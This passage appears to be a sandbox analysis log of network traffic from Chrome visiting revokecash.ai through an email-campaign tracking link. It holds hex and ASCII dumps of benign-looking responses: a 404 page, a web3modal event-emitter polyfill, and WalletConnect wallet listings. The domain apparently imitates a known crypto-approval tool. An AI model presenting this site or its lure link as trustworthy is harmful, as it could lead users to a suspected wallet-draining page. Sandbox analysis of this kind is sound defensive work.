                                                                          24192.168.2.549738104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:21 UTC833OUTGET /favicon.ico HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:22 UTC706INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 61 63 68 65 2d
                                                                          Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 10 Dec 2023 16:44:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffCache-
                                                                          2023-12-10 16:44:22 UTC156INData Raw: 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                          Data Ascii: 96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /favicon.ico</pre></body></html>
                                                                          2023-12-10 16:44:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.549740104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:22 UTC654OUTGET /@web3modal/ethereum@2.7.1/dist/cdn/__polyfill-node.events-e75a050f.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/index.es-73b49c04.js
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:22 UTC575INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:22 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:22 UTC794INData Raw: 31 35 64 35 0d 0a 69 6d 70 6f 72 74 7b 67 7d 66 72 6f 6d 22 2e 2f 62 75 6e 64 6c 65 2d 62 32 32 38 39 34 37 39 2e 6a 73 22 3b 76 61 72 20 77 3b 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 7d 76 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 66 2e 69 6e 69 74 2e 63 61 6c 6c 28 74 68 69 73 29 7d 66 2e 45 76 65 6e 74 45 6d 69 74 74 65 72 3d 66 3b 66 2e 75 73 69 6e 67 44 6f 6d 61 69 6e 73 3d 21 31 3b 66 2e 70 72 6f 74 6f 74 79 70 65 2e 64 6f 6d 61 69 6e 3d 76 6f 69 64 20 30 3b 66 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 65 76 65 6e 74 73 3d 76 6f 69 64 20 30 3b 66 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 6d 61 78 4c 69 73 74 65 6e 65 72 73 3d 76 6f 69 64 20 30 3b 66 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: 15d5import{g}from"./bundle-b2289479.js";var w;function v(){}v.prototype=Object.create(null);function f(){f.init.call(this)}f.EventEmitter=f;f.usingDomains=!1;f.prototype.domain=void 0;f.prototype._events=void 0;f.prototype._maxListeners=void 0;f.default
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 68 69 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 79 28 6e 2c 74 2c 65 29 7b 69 66 28 74 29 6e 2e 63 61 6c 6c 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 72 3d 6e 2e 6c 65 6e 67 74 68 2c 73 3d 63 28 6e 2c 72 29 2c 6f 3d 30 3b 6f 3c 72 3b 2b 2b 6f 29 73 5b 6f 5d 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 6e 2c 74 2c 65 2c 72 29 7b 69 66 28 74 29 6e 2e 63 61 6c 6c 28 65 2c 72 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 73 3d 6e 2e 6c 65 6e 67 74 68 2c 6f 3d 63 28 6e 2c 73 29 2c 69 3d 30 3b 69 3c 73 3b 2b 2b 69 29 6f 5b 69 5d 2e 63 61 6c 6c 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 6e 2c 74 2c 65 2c 72 2c 73 29 7b 69 66 28 74 29 6e 2e 63 61 6c 6c 28 65 2c 72 2c 73 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 6f 3d 6e 2e 6c 65 6e
                                                                          Data Ascii: his)};function y(n,t,e){if(t)n.call(e);else for(var r=n.length,s=c(n,r),o=0;o<r;++o)s[o].call(e)}function E(n,t,e,r){if(t)n.call(e,r);else for(var s=n.length,o=c(n,s),i=0;i<s;++i)o[i].call(e,r)}function x(n,t,e,r,s){if(t)n.call(e,r,s);else for(var o=n.len
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 6f 6e 27 29 3b 69 66 28 6f 3d 6e 2e 5f 65 76 65 6e 74 73 2c 6f 3f 28 6f 2e 6e 65 77 4c 69 73 74 65 6e 65 72 26 26 28 6e 2e 65 6d 69 74 28 22 6e 65 77 4c 69 73 74 65 6e 65 72 22 2c 74 2c 65 2e 6c 69 73 74 65 6e 65 72 3f 65 2e 6c 69 73 74 65 6e 65 72 3a 65 29 2c 6f 3d 6e 2e 5f 65 76 65 6e 74 73 29 2c 69 3d 6f 5b 74 5d 29 3a 28 6f 3d 6e 2e 5f 65 76 65 6e 74 73 3d 6e 65 77 20 76 2c 6e 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 3d 30 29 2c 21 69 29 69 3d 6f 5b 74 5d 3d 65 2c 2b 2b 6e 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 3b 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 69 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 69 3d 6f 5b 74 5d 3d 72 3f 5b 65 2c 69 5d 3a 5b 69 2c 65 5d 3a 72 3f 69 2e 75 6e 73 68 69 66 74 28 65 29 3a 69 2e 70 75 73 68 28 65 29 2c 21 69 2e 77 61 72
                                                                          Data Ascii: on');if(o=n._events,o?(o.newListener&&(n.emit("newListener",t,e.listener?e.listener:e),o=n._events),i=o[t]):(o=n._events=new v,n._eventsCount=0),!i)i=o[t]=e,++n._eventsCount;else if(typeof i=="function"?i=o[t]=r?[e,i]:[i,e]:r?i.unshift(e):i.push(e),!i.war
                                                                          2023-12-10 16:44:22 UTC1369INData Raw: 69 66 28 73 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 2c 21 73 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 72 3d 73 5b 74 5d 2c 21 72 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 72 3d 3d 3d 65 7c 7c 72 2e 6c 69 73 74 65 6e 65 72 26 26 72 2e 6c 69 73 74 65 6e 65 72 3d 3d 3d 65 29 2d 2d 74 68 69 73 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 3d 3d 3d 30 3f 74 68 69 73 2e 5f 65 76 65 6e 74 73 3d 6e 65 77 20 76 3a 28 64 65 6c 65 74 65 20 73 5b 74 5d 2c 73 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 26 26 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 22 2c 74 2c 72 2e 6c 69 73 74 65 6e 65 72 7c 7c 65 29 29 3b 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 66 6f 72 28 6f 3d 2d 31 2c 69 3d
                                                                          Data Ascii: if(s=this._events,!s)return this;if(r=s[t],!r)return this;if(r===e||r.listener&&r.listener===e)--this._eventsCount===0?this._events=new v:(delete s[t],s.removeListener&&this.emit("removeListener",t,r.listener||e));else if(typeof r!="function"){for(o=-1,i=
                                                                          2023-12-10 16:44:22 UTC696INData Raw: 20 74 79 70 65 6f 66 20 6e 2e 6c 69 73 74 65 6e 65 72 43 6f 75 6e 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 2e 6c 69 73 74 65 6e 65 72 43 6f 75 6e 74 28 74 29 3a 5f 2e 63 61 6c 6c 28 6e 2c 74 29 7d 3b 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 69 73 74 65 6e 65 72 43 6f 75 6e 74 3d 5f 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 6e 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 3b 69 66 28 74 29 7b 76 61 72 20 65 3d 74 5b 6e 5d 3b 69 66 28 74 79 70 65 6f 66 20 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 20 31 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 7d 72 65 74 75 72 6e 20 30 7d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 6e 74 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e
                                                                          Data Ascii: typeof n.listenerCount=="function"?n.listenerCount(t):_.call(n,t)};f.prototype.listenerCount=_;function _(n){var t=this._events;if(t){var e=t[n];if(typeof e=="function")return 1;if(e)return e.length}return 0}f.prototype.eventNames=function(){return this.
                                                                          2023-12-10 16:44:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.549741104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:22 UTC681OUTGET /w3m/v1/getDesktopListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1&page=1&entries=9&version=2 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://revokecash.ai
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:23 UTC724INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 37 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 32 35 64 30 34 36 37 64 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 31 32
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:22 GMTContent-Type: application/json; charset=utf-8Content-Length: 6764Connection: closeCF-Ray: 8336f3c25d0467d5-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 12
                                                                          2023-12-10 16:44:23 UTC645INData Raw: 7b 22 6c 69 73 74 69 6e 67 73 22 3a 7b 22 65 63 63 34 30 33 36 66 38 31 34 35 36 32 62 34 31 61 35 32 36 38 61 64 63 38 36 32 37 30 66 62 61 31 33 36 35 34 37 31 34 30 32 30 30 36 33 30 32 65 37 30 31 36 39 34 36 35 62 37 61 63 31 38 22 3a 7b 22 69 64 22 3a 22 65 63 63 34 30 33 36 66 38 31 34 35 36 32 62 34 31 61 35 32 36 38 61 64 63 38 36 32 37 30 66 62 61 31 33 36 35 34 37 31 34 30 32 30 30 36 33 30 32 65 37 30 31 36 39 34 36 35 62 37 61 63 31 38 22 2c 22 6e 61 6d 65 22 3a 22 5a 65 72 69 6f 6e 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 7a 65 72 69 6f 6e 2e 69 6f 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 37 33 66 36 66 35 32 66 2d 37 38 36 32 2d 34 39 65 37 2d 62 62 38 35 2d 62 61 39 33 61 62 37 32 63 63 30 30 22 2c 22 6f 72 64
                                                                          Data Ascii: {"listings":{"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18":{"id":"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18","name":"Zerion","homepage":"https://zerion.io/","image_id":"73f6f52f-7862-49e7-bb85-ba93ab72cc00","ord
                                                                          2023-12-10 16:44:23 UTC1369INData Raw: 6e 6a 65 63 74 65 64 22 3a 5b 7b 22 69 6e 6a 65 63 74 65 64 5f 69 64 22 3a 22 69 73 5a 65 72 69 6f 6e 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 65 69 70 31 35 35 22 7d 5d 2c 22 72 64 6e 73 22 3a 22 69 6f 2e 7a 65 72 69 6f 6e 2e 77 61 6c 6c 65 74 22 2c 22 6d 6f 62 69 6c 65 22 3a 7b 22 6e 61 74 69 76 65 22 3a 22 7a 65 72 69 6f 6e 3a 2f 2f 22 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 61 6c 6c 65 74 2e 7a 65 72 69 6f 6e 2e 69 6f 22 7d 2c 22 64 65 73 6b 74 6f 70 22 3a 7b 22 6e 61 74 69 76 65 22 3a 22 7a 65 72 69 6f 6e 3a 2f 2f 22 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 61 6c 6c 65 74 2e 7a 65 72 69 6f 6e 2e 69 6f 22 7d 7d 2c 22 31 39 31 37 37 61 39 38 32 35 32 65 30 37 64 64 66 63 39 61 66 32 30 38 33
                                                                          Data Ascii: njected":[{"injected_id":"isZerion","namespace":"eip155"}],"rdns":"io.zerion.wallet","mobile":{"native":"zerion://","universal":"https://wallet.zerion.io"},"desktop":{"native":"zerion://","universal":"https://wallet.zerion.io"}},"19177a98252e07ddfc9af2083
                                                                          2023-12-10 16:44:23 UTC1369INData Raw: 73 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 75 78 22 3a 6e 75 6c 6c 2c 22 63 68 72 6f 6d 65 22 3a 6e 75 6c 6c 2c 22 66 69 72 65 66 6f 78 22 3a 6e 75 6c 6c 2c 22 73 61 66 61 72 69 22 3a 6e 75 6c 6c 2c 22 65 64 67 65 22 3a 6e 75 6c 6c 2c 22 6f 70 65 72 61 22 3a 6e 75 6c 6c 7d 2c 22 69 6e 6a 65 63 74 65 64 22 3a 6e 75 6c 6c 2c 22 72 64 6e 73 22 3a 6e 75 6c 6c 2c 22 6d 6f 62 69 6c 65 22 3a 7b 22 6e 61 74 69 76 65 22 3a 22 66 69 72 65 62 6c 6f 63 6b 73 2d 77 63 3a 2f 2f 22 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 6e 75 6c 6c 7d 2c 22 64 65 73 6b 74 6f 70 22 3a 7b 22 6e 61 74 69 76 65 22 3a 6e 75 6c 6c 2c 22 75 6e 69 76 65 72 73 61 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 73 6f 6c 65 2e 66 69 72 65 62 6c 6f 63 6b 73 2e 69 6f 2f 76 32 2f 22 7d 7d 2c 22 32 63 38 31 64
                                                                          Data Ascii: s":null,"linux":null,"chrome":null,"firefox":null,"safari":null,"edge":null,"opera":null},"injected":null,"rdns":null,"mobile":{"native":"fireblocks-wc://","universal":null},"desktop":{"native":null,"universal":"https://console.fireblocks.io/v2/"}},"2c81d
                                                                          2023-12-10 16:44:23 UTC1369INData Raw: 65 73 6b 74 6f 70 22 2c 22 77 69 6e 64 6f 77 73 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 66 69 6e 69 74 79 77 61 6c 6c 65 74 2e 69 6f 2f 64 65 73 6b 74 6f 70 22 2c 22 6c 69 6e 75 78 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 66 69 6e 69 74 79 77 61 6c 6c 65 74 2e 69 6f 2f 64 65 73 6b 74 6f 70 22 2c 22 63 68 72 6f 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 66 69 6e 69 74 79 77 61 6c 6c 65 74 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 22 2c 22 66 69 72 65 66 6f 78 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 66 69 6e 69 74 79 77 61 6c 6c 65 74 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 22 2c 22 73 61 66 61 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 66 69 6e 69 74 79 77 61 6c 6c 65 74 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 22 2c 22 65 64 67 65 22 3a 22 68 74 74 70 73 3a 2f
                                                                          Data Ascii: esktop","windows":"https://infinitywallet.io/desktop","linux":"https://infinitywallet.io/desktop","chrome":"https://infinitywallet.io/download/","firefox":"https://infinitywallet.io/download/","safari":"https://infinitywallet.io/download/","edge":"https:/
                                                                          2023-12-10 16:44:23 UTC1369INData Raw: 63 34 38 32 64 66 65 33 36 38 64 34 66 30 30 34 34 37 39 39 37 37 66 64 38 38 65 38 30 64 63 39 65 38 31 31 30 37 66 33 32 34 35 64 37 30 36 38 31 31 35 38 31 61 36 64 66 65 36 39 63 35 33 34 22 3a 7b 22 69 64 22 3a 22 63 34 38 32 64 66 65 33 36 38 64 34 66 30 30 34 34 37 39 39 37 37 66 64 38 38 65 38 30 64 63 39 65 38 31 31 30 37 66 33 32 34 35 64 37 30 36 38 31 31 35 38 31 61 36 64 66 65 36 39 63 35 33 34 22 2c 22 6e 61 6d 65 22 3a 22 4e 4f 57 20 57 61 6c 6c 65 74 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 61 6c 6c 65 74 6e 6f 77 2e 61 70 70 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 62 36 65 65 34 65 66 63 2d 66 35 33 65 2d 34 37 35 62 2d 39 32 37 62 2d 61 37 64 65 64 36 32 31 31 37 30 30 22 2c 22 6f 72 64 65 72 22 3a 34 33
                                                                          Data Ascii: c482dfe368d4f004479977fd88e80dc9e81107f3245d706811581a6dfe69c534":{"id":"c482dfe368d4f004479977fd88e80dc9e81107f3245d706811581a6dfe69c534","name":"NOW Wallet","homepage":"https://walletnow.app/","image_id":"b6ee4efc-f53e-475b-927b-a7ded6211700","order":43
                                                                          2023-12-10 16:44:23 UTC643INData Raw: 7d 7d 2c 22 30 35 38 65 37 35 30 66 64 61 31 31 66 33 61 35 61 34 36 62 33 61 65 39 30 63 64 34 31 33 66 63 32 61 34 65 35 62 38 36 37 39 61 33 63 30 31 65 39 61 36 34 30 66 63 63 37 35 36 61 30 31 36 37 22 3a 7b 22 69 64 22 3a 22 30 35 38 65 37 35 30 66 64 61 31 31 66 33 61 35 61 34 36 62 33 61 65 39 30 63 64 34 31 33 66 63 32 61 34 65 35 62 38 36 37 39 61 33 63 30 31 65 39 61 36 34 30 66 63 63 37 35 36 61 30 31 36 37 22 2c 22 6e 61 6d 65 22 3a 22 43 79 70 68 65 72 6f 63 6b 20 63 79 53 79 6e 63 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 79 70 68 65 72 6f 63 6b 2e 63 6f 6d 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 37 66 64 35 61 32 33 61 2d 33 61 30 31 2d 34 63 66 62 2d 33 63 38 62 2d 39 66 34 33 61 65 34 31 34 34
                                                                          Data Ascii: }},"058e750fda11f3a5a46b3ae90cd413fc2a4e5b8679a3c01e9a640fcc756a0167":{"id":"058e750fda11f3a5a46b3ae90cd413fc2a4e5b8679a3c01e9a640fcc756a0167","name":"Cypherock cySync","homepage":"https://www.cypherock.com/","image_id":"7fd5a23a-3a01-4cfb-3c8b-9f43ae4144


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.549742104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:22 UTC655OUTGET /w3m/v1/getInjectedListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://revokecash.ai
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:22 UTC725INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 32 36 32 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 32 35 65 32 39 33 31 63 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:22 GMTContent-Type: application/json; charset=utf-8Content-Length: 42621Connection: closeCF-Ray: 8336f3c25e2931ce-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 1
